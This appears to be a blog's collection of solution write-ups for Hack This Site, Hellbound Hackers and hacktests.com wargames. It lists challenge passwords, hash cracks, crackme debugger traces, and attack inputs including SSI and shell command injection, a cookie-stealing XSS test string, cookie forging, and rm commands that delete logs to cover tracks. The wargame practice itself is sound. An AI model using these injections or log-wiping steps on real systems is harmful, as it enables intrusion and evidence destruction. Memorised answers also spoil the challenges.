PVA – My collection

HTS Basic Web 1: Check the Source

The first mission in the Basic Web category, also known as the idiot test, is certainly not a very realistic mission. It isn’t supposed to, either — It is supposed to teach you the basics needed to solve these missions. In these situations, you should always begin with looking at the source code. If you are using Firefox (which I definitely recommend), right-click and choose View source. In this level, the solution is actually written there:

<!-- the first few levels are extremely easy: password is abcd1234 --> Read more...

Basic web hacking mission 6 in Hellbound Hackers is very situational:

My friend Drake has found this new way on how to execute Unix Commands from a simple php file, but he was testing the security and the logs recorded his activities and reported it to the FBI and it chmod the file logs.txt, now the only chance for him to be safe is that you chmod the file to all+execute and delete that file and the other file that tracks people. Mr. Deitry also said the command to do all these action needs a $ in the begining

This challenge is extremely obscure and confusing. I wasn’t able to do it before reading a spoiler-pumped article by system_meltdown on Hellbound Hackers about this mission. Therefore, I am going to give the solution away.

We need to chmod a file. What file? logs.txt. Where is logs.txt? No idea! Fotunately, system_meltdown’s article reveals that it is in this very directory, in the sub-directory logs/.

The first part-mission is to chmod the log file. chmod is a UNIX command that is used to change the permissions of a file. Remember that the mysterious Mr. Deitry told us that we for some reason need to put a dollar sign ($) in front of the commands.

$ chmod a+x logs/logs.txt

The a+x part stands for “all + execute”, which will allow everyone to execute the file. Now, we will remove it with the rm command.

$ rm logs/logs.txt

Now, we only have to delete the file that tracks our presence. Don’t ask me how we’re supposed to find the filename out — I had to read the article. Apparently, it is logs/track_logs.php.

$ rm logs/track_logs.php

Therefore, the three commands that should be used are the following:

$ chmod a+x logs/logs.txt
$ rm logs/logs.txt
$ rm logs/track_logs.php

Mission accomplished.

In Basic Web Hacking mission 3, there is a problem which is quite difficult to overcome unless you’ve read about it before and know what it is about.

Now, Drake learned how to make http user agents with php.
Wrong user_agent, bwh3_user_agent wasn’t found

From the mission description, you can discern that Drake uses PHP, a server-side scripting language, to check what your user agent is. The user agent is the browser that you are currently using. In your case, your user agent is: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12 (this value was produced with the PHP variable $_SERVER['HTTP_USER_AGENT']). Changing your user agent is trivial, if you have the right tools, that is. I recommend using Firefox, which is faster and more secure than Internet Explorer.

<!–
google_ad_client = “pub-2303908469917611″;google_ad_width = 468;google_ad_height = 60;google_ad_format = “468×60_as_rimg”;google_cpa_choice = “CAAQ9eOTlwIaCN₂K₁NgLkVQQKNO₁₉3M”;google_ad_channel = “3690139778″;
//–>

When you have downloaded Firefox, you can use the extension called User Agent Switcher to spoof the data that the web brower is sending and make the server think that you are using another user agent. In this case, we understand from the error message given in the mission (Wrong user_agent, bwh3_user_agent wasn’t found) that a user_agent called bwh3_user_agent (Basic Web Hacking 3 user_agent) is required.

To accomplish this, just open User Agent Switcher and create another user_agent with the browser name “bwh3_user_agent” and refresh the page. If it doesn’t work, try refreshing this page to see what your new user agent’s name is.

“My friend Drake has begin to program in HTML and he made this IFRAME, but the host of the website has kicked him out, and he doesnt remeber where is this IFRAME reading it from.”

Despite the crude English, I managed to read that basic web hacking mission 2 is about getting the URL of the IFRAME on the page. An IFRAME is an HTML element for viewing one page inside another one (never iframe a page in itself!). You’ve just got to view the source code and search for the text “iframe”:

<IFRAME border='0' height='250' width='500' align='center' name='content' src='../basic1/b2/index.php' frameBorder='0' scrolling='yes'></IFRAME>

The page that is viewed in the IFRAME is the content of the src (source) attribute of the IFRAME element. In this case, it is:

../basic1/b2/index.php

Which also is the password for this level. Note that you must use the local path and not the absolute.

I just found out about Hellbound Hackers, an eductational hacking website which is supposed to legally simulate a realistic hacking environment, just like Hack This Site. The first challenge is, as expected, very simple. Just take a look at the source code. In the source to my challenge, I found an HTML comment that looked like this:

<!-- it has four legs and most of the time its called 'man's best friend'-->

Apparently, this mission exists just to check whether the user is capable of viewing the source code. It’s probably a riddle in order to prohibit social freaks that never talk to people from further endangering their species.

Of course, the answer and password was “dog”

http://timjoh.com/archive/guides

Hellboundhackers other challenges

(Tác giả:Phạm Đức Hải) lv4:
view source –> form submited : http_docs/mail.html
view-source:http://www.hellboundhackers.org/challenges/real4/http_docs/mail.html
<form name=”theForm” action=”../main/mail.php” METHOD=”POST”>
<input type=”hidden” name=”required” value=”‘recipient,credit”>

http://www.hellboundhackers.org/challenges/real4/main/
login page :
http://www.hellboundhackers.org/challenges/real4/main/Tlogin/index.php

lv10:
Description: Crack this hash: hbh:spnlhmTpnxYQ.
D:\kikicoco\Hacks\Tools\dicts\john>john -w:\kikicoco\Hacks\Tools\dicts\Wordlis
t.txt hbh.txt
Loaded 1 password hash (Traditional DES [24/32 4K])
website          (hbh)
guesses: 1  time: 0:00:00:19 100%  c/s: 166690  trying: website – wechsler

real 14:
Aldarhawks Flog
1. Donload Flog
2. Install
3. Check out directory
http://www.hellboundhackers.org/challenges/real14/data/users.0.dat
username    Administrator
password    d6a6bc0db10694a2d90e3a69648f3a03
rank    1
name    Aldar Hawk
email    ddowling2690@aol.com
url    http://myamazing-anti-hbh-flog/flog/
administrator.write.posts.markup    markdown_smartypants
administrator.write.posts.allowcomments    1
administrator.write.pages.markup    markdown_smartypants

Using cain to crack
Password :hacker

hellboundhackers Realistic Missions 1,2

(Tác giả:Phạm Đức Hải) lv1:
johndoe/password
http://www.hellboundhackers.org/challenges/real1/images/administrator.txt
administrator
password = password:60c033095644bd16
status:administrator
AuthID: 4601420

JohnDoe
password = password:5d2e19393cc5ef67
Network analysis
sessionid: 4601597

–> Using Js Inject
javascript:document.cookie=”AuthID=4601420″;–>Refesh–>ok

lv 2:
using scan tools (self coding)
http://www.hellboundhackers.org/challenges/real2/backups/backup_2004-09-04_1900.sql

Backups For HellBound  |                               |
————————

                          |
HellBound Backup File                                   |
==========================================              |
‘HellBound_Users’                                       |
admin: ‘9acb44549b41563697bb490144ec6258′               |
==========================================              |
End Of Backup File                                      |
————————                                |
No More Backups         |                               |
——————————————————–
9acb44549b41563697bb490144ec6258 –> MD5 hash
using Cain and Abel
Plaintext of 9acb44549b41563697bb490144ec6258 is status
Attack stopped!
1 of 1 hashes cracked

All hellboundhackers Application Missions

(Tác giả:Phạm Đức Hải) Application :

app1:
OllyDbg
0012F3E8   00403F22  RETURN to app1.00403F22 from MSVBVM60.__vbaStrCmp
0012F3EC   0040380C  UNICODE “g7*2+’&1,3″
0012F3F0   0015578C  UNICODE “1234567″
–>g7*2+’&1,3 –>frozenIce

app2 : ASCDEMO
pass word is suffix

app3:
Replace : ihavnolife –>icrackedit
PASS : 88PARROT24

app4:OllyDbg
0012F3E8   0040BCE2  RETURN to password.0040BCE2 from MSVBVM60.__vbaStrCmp
0012F3EC   00407514  UNICODE “livebox”
0012F3F0   001556BC  UNICODE “1234567″
livebox –> Atmosphere

app5:OllyDbg
004020FB   . BA A01C4000    MOV EDX,app5.00401CA0                    ;  UNICODE “ASDTY-”
00402135   . BA B41C4000    MOV EDX,app5.00401CB4                    ;  UNICODE “XYXEW-”
0040213F   . BA C81C4000    MOV EDX,app5.00401CC8                    ;  UNICODE “NUPCY”
XVI32:
Replace : XXXXX-XXXXX-XXXXX
ASDTY-XYXEW-NUPCY
google  : Visual Basic ampersand
Replace button label :Enter –>E&ter
Alt+t — >1013283

app6:
0012F96C   0040AA23  RETURN to app6.0040AA23 from MSVBVM60.__vbaStrCmp
0012F970   00409354  UNICODE “bah”
0012F974   00155E34  UNICODE “1234567″
bah –>regedit32

app7:
0012F418   00408787  RETURN to app7.00408787 from MSVBVM60.__vbaStrCmp
0012F41C   004034D0  UNICODE “jonn4y”
0012F420   0015B9FC  UNICODE “12345″
–> user : jonn4y

C2 : Search for text:
0040877C   . 68 D0344000    PUSH app7.004034D0                       ;  UNICODE “jonn4y”
004087EC   . 68 E4344000    PUSH app7.004034E4                       ;  UNICODE “vb6″
00408A6A   . 68 54364000    PUSH app7.00403654                       ;  UNICODE “Password: screwdriver”

app8:

Replace time : 1000 to 9999
Replace Enter to E&ter
OllyDbg :
0012FB24   001557D4  UNICODE “19gas482″
Replace:
Password
19gas482
change : Box –> 00 00 00 (in HEX)
–> pass : 1337Crack8055

app9:
input : test/123456
00401306  |. BF 16314000    MOV EDI,crackme1.00403116                ;  ASCII “F71B995B”
00401306  |. BF 16314000    MOV EDI,crackme1.00403116                ;  ASCII “FD7CE950″
–> pass : Alias

app10:
00401475  |. BE 7E304000    MOV ESI,crackme2.0040307E                ;  ASCII “6032F9CE9BA8D6E1″
Input : 123456
00401155  |. BF 4A314000    MOV EDI,crackme2.0040314A                ;  ASCII “2265A988CBEABA98″
==> 123456 <-> 2265A988CBEABA98
6032F9CE9BA8D6E1 –> pass encoded
Set break point :
00401475  |. BE 7E304000    MOV ESI,crackme2.0040307E                ;  ASCII “6032F9CE9BA8D6E1″
–> F7
00401484  |. F3:A6          REPE CMPS BYTE PTR ES:[EDI],BYTE PTR DS:>
ECX=00000010 (decimal 16.)
DS:[ESI]=[0040307E]=36 (‘6′)
ES:[EDI]=[0040314A]=32 (‘2′)
——–
6032F9CE9BA8D6E1
60 :
32 :
F9 : c
CE :
9B : e
9B :
A8 :
D6 :
E1 :
abcdefgh
0040147A  |. BF 4A314000    MOV EDI,crackme2.0040314A                ;  ASCII “7235F9D89BBADDF0″
ijklmnop
0040147A  |. BF 4A314000    MOV EDI,crackme2.0040314A                ;  ASCII “7A3DF1D093B2D5E8″
qrstxyzw
0040147A  |. BF 4A314000    MOV EDI,crackme2.0040314A                ;  ASCII “6225E9C886A5C0EF”

app11:
PEiD.exe –> check
–> C# code
Reflector.exe
–> decode
text29    ”To Dead To Hide”    string
text27    ”Strong Witted”    string
Pass : Strong Witted

hellboundhackers basic web challenges 17,18,19

(Tác giả:Phạm Đức Hải) lv17:
basic17.class
http://hellboundhackers.org/challenges/basic17/basic17.class
// Decompiled by DJ v3.9.9.91 Copyright 2005 Atanas Neshkov  Date: 3/13/2007 2:25:00 PM
// Home Page : http://members.fortunecity.com/neshkov/dj.html  – Check often for new version!
// Decompiler options: packimports(3)
// Source File Name:   basic17.java

import java.applet.Applet;
import java.applet.AppletContext;
import java.awt.Color;
import java.awt.TextField;
import java.awt.event.ActionEvent;
import java.awt.event.ActionListener;
import java.net.MalformedURLException;
import java.net.URL;

public class basic17 extends Applet
implements ActionListener
{

public void init()
{
setBackground(Color.WHITE);
}

public basic17()
{
file4 = “baysick-seventeen.complete.php?pass=”;
inputLine = new TextField(15);
file2 = “test”;
add(inputLine);
inputLine.addActionListener(this);
file2 = “challenges”;
}

public void actionPerformed(ActionEvent actionevent)
{
String s = inputLine.getText();
if(s.equals(“ifYOU’REhereYOU’REelite”))
{
URL url = null;
String s1 = “http://www.hellboundhackers.org/“;
String s2 = “basic17″;
try
{
url = new URL(getDocumentBase(), s1 + “/” + file2 + “/” + s2 + “/” + file4 + new String(“elite”));
}
catch(MalformedURLException malformedurlexception) { }
getAppletContext().showDocument

(url);
} else
{
inputLine.setText(“not yet”);
}
}

String file4;
TextField inputLine;
String file2;
}

–> Pass:ifYOU’REhereYOU’REelite

Lv18:

lv19:
View header:
Encryption: ROT-47
Password: #@Ecfu@C%96(:?P
http://just-stuart.com/cgi-bin/ur13?proc
Pass:Rot47ForTheWin!

hackthissite : basic mission solution

(Tác giả:Phạm Đức Hải) By meomeo079
lv1  : 896450d8
lv2  : no pass
lv3 : http://www.hackthissite.org/missions/basic/4/password.php
b23c8d4d
lv 4 : 51f1b074
save file and change :
<form action=”http://www.hackthissite.org/missions/basic/4/level4.php” method=”post”>
<input name=”to” value=”loveha@gmail.com” type=”hidden”><input value=”Send password to Sam” type=”submit”></form></center><br><br><center><b>password:</b><br>
lv 5 : javascript:void(document.forms[1].to.value=”loveha@gmail.com”);
javascript:alert(document.forms[1].to.value);
ca87405d
lv6 :
a- >z :
abcdefghi……….
acegikmoqsuwy{}ƒ…‡‰‹’
1234567890—>
13579;=?A9
23456789
2468:<>@
(i+0)(i+1)(i+2)
pass: e-0 1-1 h-2 8-3 8-4 f-5 i-6 :-7 == e0f54ac3
lv 7 :
2004;ls
k1kh31b1n55h.php
index.php
level7.php
cal.pl
http://www.hackthissite.org/missions/basic/7/k1kh31b1n55h.php
f6d1916d

Lv8 :
/var/www/hackthissite.org/html/missions/basic/8/
Sam’s young daughter Stephanie used SSI
More infor about SSI : http://httpd.apache.org/docs/1.3/howto/ssi.html
–> type in the text box :
<!–#exec cmd=”ls” –>
<!–#exec cmd=”ls /missions/basic/8/” –>
Hi, tshngmww.shtml hipykpqu.shtml ztxdhjxn.shtml avpfeoie.shtml
fviqpmaw.shtml kqbybdzc.shtml dzrnmzgx.shtml npcsygfl.shtml
whqxxojt.shtml ylomcmvu.shtml uhdppswp.shtml gzntiicx.shtml
dzwbqiuu.shtml qvzuieng.shtml smcerykh.shtml qjhnmhmq.shtml znodwztr.shtml!

Your name contains 254 characters.
–> No no no
<!–#exec cmd=”ls ..” –>
–>wow –>
http://www.hackthissite.org/missions/basic/8/au12ha39vc.php
Pass : 47f1a145

All hellboundhackers JavaScript challenges solution

(Tác giả:Phạm Đức Hải) All hellboundhackers JavaScript challenges solution

lv1:
<!–
function pasuser(form) {
if (form.id.value==”partyhard2″) {
if (form.pass.value==”lifeisshort1″) {
location=”index.php?user=partyhard2&pass=lifeissho

rt1″
}
else {
alert(“Invalid Password”)
}
}
else {
alert(“Invalid UserID”)
}
}
//–>

lv2:

http://www.hellboundhackers.org/challenges/js/js2/level2script.js
<!–
var password, i;

password=prompt(“Please enter password!”,”");
if (password==”level2done”) {
location=”huh.php”
i=4;
}
else {
alert(“Wrong password, you’ll go back to the index”)
location=”index.php”
}

//–>

lv3:

<script>
var U7=window,W8=document;
var a1=”%3Cscript%20language%3D%22JavaScript1.1%22%3E%0D%0A%3C%21–%0D%0Afunction%20right%28e%29%20%7B%0D%0A%20%20if%20%28navigator.appName%20%3D%3D%20%27Netscape%27%20%26%26%20%28e.which%20%3D%3D%203%20%7C%7C%20e.which%20%3D%3D%202%29%29%0D%0A%20%20%20%20return%20false%3B%0D%0A%20%20else%20if%20%28navigator.appName%20%3D%3D%20%27Microsoft%20Internet%20Explorer%27%20%26%26%20%28event.button%20%3D%3D%202%20%7C%7C%20event.button%20%3D%3D%203%29%29%20%7B%0D%0A%20%20%20%20alert%28%22Rigth-mouse%20click%20isn%27t%20allowed%21%22%29%3B%0D%0A%20%20%20%20return%20false%3B%0D%0A%20%20%7D%0D%0A%20%20return%20true%3B%0D%0A%7D%0D%0Adocument.onmousedown%3Dright%3B%0D%0Aif%20%28document.layers%29%20window.captureEvents%28Event.MOUSEDOWN%29%3B%0D%0Awindow.onmousedown%3Dright%3B%0D%0A//–%3E%0D%0A%3C/script%3E%0D%0A%0D%0A%3Cscript%20language%3D%22javascript%22%3E%0D%0A%3C%21–%0D%0Afunction%20pasuser%28form%29%20%7B%0D%0Avar%20text2%3D%27lolage%27%0D%0Avar%20text4%3D%27hahaomgz%27%0D%0A%20%20if%20%28form.text1.value%3D%3Dtext2%29%20%7B%20%0D%0A%20%20%20%20if%20%28form.text3.value%3D%3Dtext4%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0D%0A%20%20%20%20%20%20location%3D%22index.php%3Ftext1%3Dlol%26text3%3Dhaha%22%20%0D%0A%20%20%20%20%7D%0D%0A%20%20%20%20else%20%7B%0D%0A%20%20%20%20%20%20alert%28%22Invalid%20Password%22%29%0D%0A%20%20%20%20%7D%0D%0A%20%20%7D%0D%0A%20%20else%20%7B%0D%0A%20%20%20%20alert%28%22Invalid%20UserID%22%29%0D%0A%20%20%7D%0D%0A%7D%0D%0A//–%3E%0D%0A%3C/script%3E%0D%0A%3Ccenter%3E%0D%0A%20%20%3Ctable%20cellpadding%3D%224%22%20border%3D%220%22%3E%0D%0A%20%20%20%20%3Ctr%3E%0D%0A%20%20%20%20%20%20%3Ctd%20align%3D%22center%22%20height%3D%2224%22%20width%3D%2284%22%3EUser%20ID%3A%3C/td%3E%0D%0A%20%20%20%20%20%20%3Ctd%20align%3D%22center%22%20height%3D%2224%22%20width%3D%22170%22%3E%3Cform%20name%3D%22login%22%3E%3Cinput%20name%3D%22text1%22%20type%3D%22text%22%3E%3C/td%3E%0D%0A%20%20%20%20%3C/tr%3E%0D%0A%20%20%20%20%3Ctr%3E%0D%0A%20%20%20%20%20%20%3Ctd%20align%3D%22center%22%20height%3D%2224%22%20width%3D%2284%22%3EPassword%3A%3C/td%3E%0D%0A%20%20%20%20%20%20%3Ctd%20align%3D%22center%22%20height%3D%2224%22%20width%3D%22170%22%3E%3Cinput%20name%3D%22text3%22%20type%3D%22password%22%3E%3C/td%3E%0D%0A%20%20%20%20%3C/tr%3E%0D%0A%20%20%20%20%3Ctr%3E%0D%0A%20%20%20%20%20%20%3Ctd%20align%3D%22center%22%20height%3D%221%22%20width%3D%2284%22%3E%3Cinput%20type%3D%22button%22%20value%3D%22Login%22%20onClick%3D%22pasuser%28this.form%29%22%3E%3C/td%3E%0D%0A%20%20%20%20%20%20%3Ctd%3E%3C/td%3E%0D%0A%20%20%20%20%3C/tr%3E%0D%0A%20%20%3C/table%3E%0D%0A%3C/center%3E”;
function V0(){var V0;V0=unescape(a1);W8.write(V0);}V0();
</script>
Using html decode : http://scriptasylum.com/tutorials/encdec/encode-decode.html

<script>
var U7=window,W8=document;
var a1=”<script language=”JavaScript1.1″>
<!–
function right(e) {
if (navigator.appName == ‘Netscape’ && (e.which == 3 || e.which == 2))
return false;
else if (navigator.appName == ‘Microsoft Internet Explorer’ && (event.button == 2 || event.button == 3)) {
alert(“Rigth-mouse click isn’t allowed!”);
return false;
}
return true;
}
document.onmousedown=right;
if (document.layers) window.captureEvents(Event.MOUSEDOWN);
window.onmousedown=right;
//–>
</script>

<script language=”javascript”>
<!–
function pasuser(form) {
var text2=’lolage’
var text4=’hahaomgz’
if (form.text1.value==text2) {
if (form.text3.value==text4) {
location=”index.php?text1=lol&text3=haha”
}
else {
alert(“Invalid Password”)
}
}
else {
alert(“Invalid UserID”)
}
}
//–>
</script>
<center>
<table cellpadding=”4″ border=”0″>
<tr>
<td align=”center” height=”24″ width=”84″>User ID:</td>
<td align=”center” height=”24″ width=”170″><form name=”login”><input name=”text1″ type=”text”></td>
</tr>
<tr>
<td align=”center” height=”24″ width=”84″>Password:</td>
<td align=”center” height=”24″ width=”170″><input name=”text3″ type=”password”></td>
</tr>
<tr>
<td align=”center” height=”1″ width=”84″><input type=”button” value=”Login” onClick=”pasuser(this.form)”></td>
<td></td>
</tr>
</table>
</center>”;
function V0(){var V0;V0=unescape(a1);W8.write(V0);}V0();
</script>
—>
var text2=’lolage’
var text4=’hahaomgz’
—>http://www.hellboundhackers.org/challenges/js/js3/index.php?text1=lol&text3=haha
Change to : http://www.hellboundhackers.org/challenges/js/js3/index.php?text1=lolage&text3=hahaomgz –>ok

lv4:
javascript:alert(document.cookie);document.write (document.cookie);
Using XSS:
http://www.hellboundhackers.org/challenges/js/js4/index.php?submit=%3Cscript%3Ealert(document.cookie)%3C/script%3E

lv 5:
<script language=”JavaScript” src=”level5.js”></script>
http://www.hellboundhackers.org/challenges/js/js5/level5.js
a = prompt(“Please enter password!”,”");
date = new Date();
year = date.getYear();
b = year+12;
if(a == b){
alert(“Good job! You got it!”);
window.location.href=year+”.php”;
}
else
{
alert(“Try it again!”);

}

—->Create a html file :
<html>
<head>
<title>Owned</title>
</head>
<script language=”javascript”>
a = prompt(“Please enter password!”,”");
date = new Date();
year = date.getYear();
b = year+12;
alert(b);
if(a == b){
alert(“Good job! You got it!”);
window.location.href=year+”.php”;
}
else
{
alert(“Try it again!”);

}

</script>
</html>
———> alert(b); 118

lv6:
<script language=”Javascript”>
function checkPass(){
Location  = document.form.password.value
Location = “js6-” + “window.open” + “.php”
document.write(“Pass= ” + Location);
if (document.form.password.value == Location ) {
alert(“Good Job!”)
window.open(Location)
}
else{
alert(“Try Again!”)
}
}
</script>

—>pass: js6-window.open.php

lv7 :
Using Flashget download file :
http://www.hellboundhackers.org/challenges/js/js7/index.php
<script language=”JavaScript”>

function password () {

var s1, a2, v3, e4, input;
s1=window.document.bgColor;
a2=window.document.linkColor;
v3=s1.substring (6,9)+a2.substring (2,8);
e4=v3.toUpperCase ();
input=prompt(“Password:”,”");
if (input!=v3 && input!=e4) {
alert(“Wrong!”);
window.location.href=”../index.php”;
}
else {
window.location.href=v3+”.php”;
}
}
</script>
</head>
<body bgcolor=”#D0D0D0″ text=”#FF9900″ onLoad=”password()” link=”#FF9900″>

—>pass :0f9900

lv8:
<script>document.cookie=”secret=90 dd 3b 21 5f 23 9a 63 3f a6 ae 3c 31 64 3f 60 2e ea 3f 72 51 cf fd f0 fe”</script>
Solve : hex->decial->ACSII
90  dd  3b 21 5f 23 9a  63 3f a6  ae  3c 31 64  3f 60 2e ea  3f 72  51 cf  fd  f0  fe144 221 59 33 95 35 154 99 63 166 174 60 49 100 63 96 46 234 63 114 81 207 253 240 254
144 221 59 33 95 35 154 99 63 166 174 60 49 100 63 96 46 234 63 114 81 207 253 240 254
A-AZ: 65-90
a-Z : 97-122
max : 254-122 = 132
—> 63 : a,e,i,o,u
63 : a,–> d=97-63=36 : ª
63 : e –> d=101-63 = 38 : ¶
63 : i –> d=105-63 = 42 : º
63 : o –> d=111-63 = 48 : À
63 : u

lv9:
<script>
var c = 34200;
var p = “%68%6F%77%73%6C%69%66%65%3F%65%61%73%79%2E%00″;
var a;
fc();
function fc()
{
if(c>0)
{
document.getElementById(“say”).innerHTML = “<b><big>Please wait ” + c + ‘ seconds.</big></b>’;
c = c – 1;
setTimeout(“fc()”, 1000)
} else {
a = unescape(“%33″);
document.getElementById(“say”).innerHTML = “Your password is: ” + unescape(p-a) + unescape(“%3C%66%6F%72%6D%20%61%63%74%69%6F%6E%3D%27%69%6E%64%65%78%2E%70%68%70%27%20%6D%65%74%68%6F%64%3D%27%50%4F%53%54%27%3E%0D%0A%45%6E%74%65%72%20%50%61%73%73%77%6F%72%64%3A%20%3C%69%6E%70%75%74%20%74%79%70%65%3D%27%74%65%78%74%27%20%6E%61%6D%65%3D%27%70%61%73%73%27%20%73%74%79%6C%65%3D%27%74%65%78%74%62%6F%78%27%3E%3C%62%72%3E%0D%0A%3C%69%6E%70%75%74%20%74%79%70%65%3D%27%73%75%62%6D%69%74%27%20%6E%61%6D%65%3D%27%73%75%62%6D%69%74%27%20%76%61%6C%75%65%3D%27%43%68%65%63%6B%20%79%6F%75%20%61%6E%73%77%65%72%27%20%73%74%79%6C%65%3D%27%62%75%74%74%6F%6E%27%3E%0D%0A%3C%2F%66%6F%72%6D%3E%00″);
}
}
</script>

decode :
<script>
var c = 34200;
var p = “howslife?easy.”;
var a;
fc();
function fc()
{
if(c>0)
{
document.getElementById(“say”).innerHTML = “<b><big>Please wait ” + c + ‘ seconds.</big></b>’;
c = c – 1;
setTimeout(“fc()”, 1000)
} else {
a = unescape(“3″);
document.getElementById(“say”).innerHTML = “Your password is: ” + unescape(p-a) + unescape(“<form action=’index.php’ method=’POST’>
Enter Password: <input type=’text’ name=’pass’ style=’textbox’><br>
<input type=’submit’ name=’submit’ value=’Check you answer’ style=’button’>
</form>;
}
}
</script>
—-: javascript:c=1;Back–>ok

lv10:
<script>
//By system_meltdown
function checkpass()
{
pass=document.password.pass.value;
rawr=unescape(‘%61%68%6f%79′);
string=”llama llama duck!”;
a=string.charCodeAt(1);
b=string.charCodeAt(7);
c=string.charCodeAt(4);
schloob60*50/3*a)-(b*c))/2/5+b;
asdf=rawr+”_”+schloob;
if(pass==asdf)
{
alert(‘Wahoo you got it!’);
}
else
{
alert(‘Awww shame!’);

}
}
</script>
rawr=unescape(‘%61%68%6f%79′);decode : rawr=unescape(‘ahoy’);
schloob=9860.4
asdf=ahoy_9860.4

lv11:
<script>
//By system_meltdown
var s = “Llama llama chicken duck, schloob mcfroob, moo asdf qwerty zxcv. Rawr llama kinasd, [insert random crap here]It’s hammer on the keyboard time: sfsdfoashdfy78sdfysdfs67dftsdf 6tsdf76as tfa. Well I’m bored, so if you’re still reading this I advise you to stop because you are wasting your time….dumbarse “;
var asd = s.charCodeAt(14);
var fdsa = s.charCodeAt(42);
var sadfasf = s.charCodeAt(4);
var moo = s.charCodeAt(43);
var teeep = s.charCodeAt(32);
var asdf = asd+fdsa+sadfasf+moo+teeep;
function checkpass()
{
pass=document.password.pass.value;
if(pass==asdf)
{
alert(‘Well done dude!’);
}
else
{
alert(‘You suck!’);
}
}
</script>

—>javascript:alert(asdf); –>pass : 441

lv12:
<script>

function checkpass()
{
pass=document.password.pass.value;
z=2;
x=z*1.5;
v=z*2;
w=v*1.75;
y=v*1.25;
abc(y*v*y*x+z)*x+w)*z+y)*v+w;

if(pass==abc)
{
alert(‘Congratz! You are good at Math’);
}
else
{
alert(‘Sorry, try again when you learn more Math!’);

}

}

</script>

—> pass: 7331

lv13:
<script>document.cookie=’authorized=false’</script>
–>
http://www.hellboundhackers.org/challenges/js/js13/index.php?javascript:document.cookie=’authorized=true‘

lv14:
script>
a = screen.width;
if(a != 800)
{
alert(‘Sorry you do not have the right parameters!’);
}else{
window.location=’/challenges/js/js14/index.php?ans=0e110c5fbf226dffd25740ae56d4edb1′
}
http://www.hellboundhackers.org/challenges/js/js14/index.php?ans=0e110c5fbf226dffd25740ae56d4edb1

lv15:
var a = password.charAt(9)=q
var b = password.charAt(10)=u
var c = password.charAt(4)=e
var d = password.charAt(7)=r
var e = password.charAt(1)=y
var f = password.charAt(6)=”"
var g = password.charAt(3)=t
var h = password.charAt(8)=e
var i = password.charAt(0)=s
var j = password.charAt(13)=t
var k = password.charAt(6)=”"
var l = password.charAt(5)=m
var m = password.charAt(11)=e
var n = password.charAt(2)=s
var o = password.charAt(12)=s
var riddle = “query test mess”;
–>pass : system request

( sưu tầm từ guru.net.vn )Trong khi thử chơi vài cái war game ở hacktests.com tôi phát hiện ra một sự nhầm lẫn nho nhỏ của Ian Qvist. Và Ian Qvist đã fix ngay lỗi này:
http://hacktests.com/ViewNews.aspx?NewsId=25

Có lẽ vì ông bạn Ian Qvist, thay vì viết hết tất cả các lời giải (solution) tôi chỉ viết các chỉ dẫn (hint) để bạn có thể tự mình hoàn thành các challanges ở đây. Các password tôi sẽ ẩn đi để các bạn tự tìm.

JavaScript challanges
JavaScript 1:
Bạn cần View-source trang
http://752913a7-9050-4a92-aa02-acd15c6fd39f.hacktests.com/Login.aspx
và bạn sẽ thấy đoạn code sau :

<script language="JavaScript" type="text/javascript">
        <!--
        var username= "Marin"
        var password= "MySecretPassword";

        password=prompt("Please enter the login password","");

        if (password=="MySecretPassword")
        {
            window.location.href="http://www.disneylandparis.com";
        }
        else if (password=="xxxxxxxxxxxxx")
        {
            window.location.href="xxxxxxxxxxxxx";
        }
        else
        {
            window.location.href="http://www.disneylandparis.com";
        }
        //-->
    </script>

Như vậy bạn sẽ nhận được mật khẩu cần tìm.
Congratulations! You completed this level.
To register the site as completed, you need a Password ID.

Password ID:  173c1aa5-xxxx-xxxx-xxxx-xxxxxxxxxxxx

JavaScript 2:
tương tự cái trên bạn cũng view-source và nhận dc đoạn code:

<script language="JavaScript" type="text/javascript">
        <!--
        var multiply = 1;
        var divide = 3;
        var plus = 84;
        var nr = 2;
        var i = 0;

        number=prompt("Please enter the correct number","");

        multiply = multiply + multiply * multiply;
        divide = divide * 4 * divide;
        plus = plus * plus - plus + 3;
        i = number + multiply + plus * divide + nr;

        if (i == 162758)
        {
            window.location.href="xxxxxxxxxxxxx.aspx";
        }
        else
        {
            window.location.href="http://www.disneylandparis.com";
        }
        //-->
    </script>

Bạn để ý dòng if (i == 162758) , như vậy bạn cần biết JavaScript inline debug để thay đổi giá trị của i, để được cái cần tìm.
Cũng có thể bạn không cần tìm ra i mà vẫn có point bằng cách chạy link :
Run http://352913a7-9050-4a92-aa02-acd15c6fd39f.hacktests.com/xxxxxxxxxxxxx.aspx get point

JavaScript 3:
View-source:http://bb3cbf3c-bab4-498a-9baf-12721a6bc0b5.hacktests.com/Login.aspx
Bạn sẽ nhìn thấy 1 đoạn javascript nhưng xem ra sẽ không nhìn thấy mật khẩu ngay, bạn cần phân tích một chút.
Bạn save file đó về máy và thêm vào như sau nhé :

<script language="JavaScript" type="text/javascript">
        <!--
        var oxo0x00xox0xoo0xox00xo0x00xox0xoo0xox0 = "83345";
        var oxo0x00xox0x0o0x0x0xo0x00xox0xoo0xox0 = "extrastrongpassword";

        password=prompt("Please enter the login password","");

        newPassword = oxo0x00xox0xoo0xox00xo0x00xox0xoo0xox0.substr(1,1) + oxo0x00xox0xoo0xox00xo0x00xox0xoo0xox0.substr(3,1) + oxo0x00xox0xoo0xox00xo0x00xox0xoo0xox0.substring(0,1) + password.substring(1);
    alert(newPassword);
        if (newPassword=="348873")
        {
            window.location.href=password.substring(2,1) + password.substring(1,1) + password.substring(3,1) + "." + oxo0x00xox0x0o0x0x0xo0x00xox0xoo0xox0.substring(4,5) + oxo0x00xox0x0o0x0x0xo0x00xox0xoo0xox0.substring(5,6) + oxo0x00xox0x0o0x0x0xo0x00xox0xoo0xox0.substring(11,12) + oxo0x00xox0x0o0x0x0xo0x00xox0xoo0xox0.substring(1,2);
        }
        else
        {
            alert("Go search for the solution");
            window.location.href="http://www.google.com";
        }
        //-->
    </script>

Từ đó bạn sẽ suy luận ra kết quả
Hint : kết quả có 3 số , http://bb3cbf3c-bab4-498a-9baf-12721a6bc0b5.hacktests.com/xxx.aspx

JavaScript 4:
View-source:http://9cf786f3-ddbf-44b4-99cf-7949fadcdc18.hacktests.com/Login.aspx
Đây là 1 ví dụ về User Agent Switcher
Bạn cần dùng Firefox và cài đặt (Install) : User Agent Switcher
https://addons.mozilla.org/firefox/59/
You need to be viewing this page in the GuardDog 3 browser on the CandyLand operating system, to see the correct image!
